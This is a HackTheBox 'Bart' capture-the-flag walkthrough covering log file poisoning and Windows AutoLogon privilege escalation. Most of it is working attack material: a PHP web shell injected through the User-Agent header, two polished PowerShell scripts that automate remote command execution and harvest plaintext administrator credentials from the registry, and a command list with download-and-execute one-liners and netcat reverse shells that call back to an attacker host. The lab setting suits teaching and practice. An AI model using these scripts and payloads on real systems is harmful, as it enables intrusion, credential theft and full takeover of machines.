We covered Log File Poisoning and Windows Privilege Escalation by exploiting Windows AutoLogon, which stores the logon credentials in plaintext in the registry. This was part of HackTheBox Bart.
BART is a WINDOWS machine, and is of MEDIUM difficulty.
Initial Enumeration
I started with an Nmap scan, which revealed an open port 80 running Microsoft Internet Information Services (IIS) version 10. The scan also showed a redirect to forum.bart.htb, so I added it and the other related hostnames (monitor.bart, internal01.bart) to my /etc/hosts file. Browsing to forum.bart.htb led to a WordPress site. I attempted to access wp-admin but encountered an internal server error. By viewing the page source, I found an email address for a developer, Harvey Potter (H.Potter@...), and deduced the email naming convention for the other team members (e.g., S.Brown, D.Simons, R.Hilton).
Directory Brute-forcing and Login
I used gobuster to find hidden directories and discovered /monitor and /forum. Navigating to bart.htb/monitor redirected to a login form. The "Forgot Password" function responds differently for existing and non-existing accounts, which confirmed that the username format was the first name (e.g., "Harvey"). I guessed the password for "Harvey" as "Potter" (his surname) and successfully logged in. I guessed manually rather than brute-forcing: the login form carries a CSRF token, which complicates automated password guessing because every attempt needs a fresh token.
Internal Chat and Source Code Analysis
Inside the monitor portal, an "Internal Chat" link led to internal01.bart. This page had another login form, for a "Simple Chat" application. By inspecting the CSS, I found the author of the application, and googling "Simple Chat" led me to its source code on GitHub. The source code revealed a registration script (register.php) that accepts uname and password parameters via a POST request. I used curl to send that POST request and register a new user.
Log File Poisoning
After logging into the chat application, I noticed a "Log" button. Intercepting the request with Burp Suite showed that clicking "Log" sent a request to log/log.php, which appended a line (date, username, user-agent) to log/log.txt and then rendered that file back to the browser. The username was hardcoded as "Harvey". Because log.php includes the log file, anything written into it is parsed as PHP, and the User-Agent header is entirely attacker-controlled: a textbook log file poisoning setup. I injected a simple PHP web shell, <?php system($_GET['CMD']); ?>, through the User-Agent header. Accessing log/log.php?CMD=whoami then confirmed command execution. Two caveats: the poisoned line is executed again on every later visit to log.php, so the payload must be syntactically valid PHP (a parse error in the log breaks the page, and nothing short of a working shell lets you remove the line again), and every visit adds a new log line, so command requests should use a harmless User-Agent to avoid planting the payload repeatedly.
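The poisoning step above, driven from PowerShell as an added example (this is not code from the original write-up). It assumes the layout described in this section: log/log.php appends the User-Agent to log/log.txt and then includes that file, log.php is reachable without a session cookie, and the hostname is the one used in this write-up. Unique markers around the output make the command result easy to extract from the rest of the log page.

```powershell
# Added example, not code from the original write-up. Assumptions: log/log.php
# appends the User-Agent to log/log.txt and then includes that file, no session
# cookie is needed to reach it, and the hostname below is the write-up's.
$LogUri = 'http://internal01.bart/log/log.php'   # if the Log button sends extra query parameters, copy them from Burp
$Sep    = if ($LogUri.Contains('?')) { '&' } else { '?' }

# Unique markers let us cut the command output out of the noisy log page, which
# also contains every earlier log line (including any previous payload).
$Start = 'BEGIN_' + [guid]::NewGuid().ToString('N')
$End   = 'END_'   + [guid]::NewGuid().ToString('N')

# The line is written once but executed on EVERY later render of log.php, so the
# payload must be valid PHP: a parse error in the log file kills the page for good.
# `$_GET is backtick-escaped so PowerShell does not try to expand it.
$Payload = "<?php echo '$Start'; if (isset(`$_GET['CMD'])) { system(`$_GET['CMD']); } echo '$End'; ?>"

function Invoke-LogPoison {
    # One request with the crafted User-Agent is enough to plant the payload.
    Invoke-WebRequest -Uri $LogUri -UserAgent $Payload -UseBasicParsing | Out-Null
}

function Invoke-PoisonedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # Harmless User-Agent here: every visit is logged, and we do not want a
    # second copy of the payload in the file.
    $Uri  = $LogUri + $Sep + 'CMD=' + [uri]::EscapeDataString($Command)
    $Resp = Invoke-WebRequest -Uri $Uri -UserAgent 'Mozilla/5.0' -UseBasicParsing
    $Pattern = '(?s)' + [regex]::Escape($Start) + '(.*?)' + [regex]::Escape($End)
    $m = [regex]::Match($Resp.Content, $Pattern)
    if (-not $m.Success) { throw 'Markers not found: is log.txt still being included by log.php?' }
    return $m.Groups[1].Value.Trim()
}

Invoke-LogPoison
Invoke-PoisonedCommand 'whoami'
Invoke-PoisonedCommand 'whoami /priv'
```

Windows PowerShell 5.1 sends the -UserAgent value verbatim; if your client refuses a User-Agent containing PHP tags, curl -A with the same $Payload string does the same job. The isset() guard is what makes the payload safe to leave in the log: visits without a CMD parameter (such as the poisoning request itself, or the victim's own use of the Log button) only print the markers.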
Gaining Initial Access (Reverse Shell)
I set up a Python HTTP server to host Nishang's PowerShell reverse shell script (Invoke-PowerShellTcp.ps1), modified with my IP address and a listening port. Through the log poisoning vulnerability, I ran a PowerShell command that downloads the script from my server and executes it in memory. With a netcat listener waiting, I received a reverse shell.
Privilege Escalation
The initial shell was running as a low-privilege user. I checked privileges with whoami /priv and found SeImpersonatePrivilege enabled, so Juicy Potato would have been an option, but I chose a different path: running winPEAS flags an "AutoLogon" finding, meaning the administrator credentials are stored in the registry. The initial shell was 32-bit, which caused some commands to misbehave, so I downloaded a 64-bit nc64.exe to the target machine and started a new, more stable 64-bit reverse shell.
I then queried the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon for the plaintext DefaultUserName (Administrator) and DefaultPassword values, which hold the AutoLogon account and its password. Using PowerShell, I created a credential object from the retrieved administrator username and password. I prepared another Nishang reverse shell script (shell1.ps1) with a different port. Finally, I used Invoke-Command with the -Credential parameter (the admin credentials) and -ComputerName localhost to download and execute the new reverse shell script. Invoke-Command against localhost goes over WinRM, so this only works because the WinRM service is running on the box and the Administrator account is allowed to use it. The resulting reverse shell ran as Administrator, allowing me to read the root flag.
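The AutoLogon check and credential re-use above, packaged as one script you can run from the low-privileged shell. This is an added example, not code from the original write-up; it uses only generic Windows/PowerShell, and the stager URL inside the ScriptBlock is a placeholder (assumption), not a value from the write-up.

```powershell
# Added example, not code from the original write-up. Checks the Winlogon key for
# cleartext AutoLogon credentials and, if found, runs a command as that account
# through WinRM. The stager URL in the ScriptBlock is a placeholder (assumption).
$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonCredential {
    # Returns a PSCredential if the Winlogon key holds a cleartext DefaultPassword,
    # otherwise $null.
    $p = Get-ItemProperty -Path $WinlogonKey -ErrorAction Stop
    if ($p.AutoAdminLogon -ne '1') {
        Write-Warning "AutoAdminLogon is '$($p.AutoAdminLogon)'; stored values may still be reusable"
    }
    if ([string]::IsNullOrEmpty($p.DefaultPassword)) {
        # Windows can also keep the AutoLogon password in the LSA secret named
        # DefaultPassword; that is not readable from a low-privileged shell, so
        # from here only the cleartext registry value helps.
        Write-Warning 'No cleartext DefaultPassword under Winlogon'
        return $null
    }
    # DefaultDomainName is the machine name for a local account (BART here).
    $domain = if ($p.DefaultDomainName) { $p.DefaultDomainName } else { $env:COMPUTERNAME }
    $secure = ConvertTo-SecureString $p.DefaultPassword -AsPlainText -Force
    return New-Object System.Management.Automation.PSCredential("$domain\$($p.DefaultUserName)", $secure)
}

$Cred = Get-AutoLogonCredential
if ($null -eq $Cred) { return }
"Cleartext AutoLogon credentials found for $($Cred.UserName)"

# Invoke-Command -ComputerName localhost talks to the local WinRM service, so it
# only works if WinRM is listening and the account may use it (members of the
# local Administrators group can by default). Check before relying on it.
if (-not (Test-WSMan -ErrorAction SilentlyContinue)) {
    Write-Warning 'WinRM is not listening; use Start-Process -Credential or another vector instead'
    return
}
Invoke-Command -ComputerName localhost -Credential $Cred -ScriptBlock {
    whoami    # expect <machine>\administrator
    # Replace with the reverse-shell stager of your choice, e.g.
    # IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell1.ps1')
}
```

Run it from the 64-bit shell. Get-ItemProperty returns the same DefaultUserName and DefaultPassword values that reg query shows; the function only wraps them in a PSCredential so that Invoke-Command, Start-Process -Credential or any other cmdlet taking -Credential can use them directly.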
Technical Commands
nmap <target_ip>
cat /etc/hosts
gobuster dir -u http://forum.bart.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt --exclude-length 150,693
curl -X POST -d "uname=myname&password=password123" http://internal01.bart/simplechat/register.php  (register a chat user)
http://internal01.bart/log/log.txt  (accessing the log file)
http://internal01.bart/log/log.php  (accessing PHP info via the poisoned log)
http://internal01.bart/log/log.php?CMD=whoami  (executing a command via the poisoned log)
ls
cd shells
cd nishang
cp Invoke-PowerShellTcp.ps1 ../../shell.ps1
ifconfig  (or: ip a)
python3 -m http.server 8000
powershell -ep bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell.ps1')"  (PowerShell download-and-execute, sent via the poisoned log)
nc -lvnp 4545  (netcat listener)
whoami /priv
powershell -c "Invoke-WebRequest -Uri http://<attacker_ip>:8000/nc64.exe -OutFile nc64.exe"  (PowerShell command to download nc64.exe)
./nc64.exe <attacker_ip> 4546 -e powershell.exe  (start a 64-bit reverse shell)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName  (registry query for the AutoLogon credentials)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
$UserName = "Bart\Administrator"  (PowerShell commands to create the credential object)
$Password = ConvertTo-SecureString "THE_RETRIEVED_PASSWORD" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential($UserName, $Password)
cp shell.ps1 shell1.ps1
nano shell1.ps1
nc -lvnp 4547
Invoke-Command -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell1.ps1') } -Credential $Cred -ComputerName localhost  (PowerShell command to execute the reverse shell as Administrator)
cd ..
ls
cd Desktop
type root.txt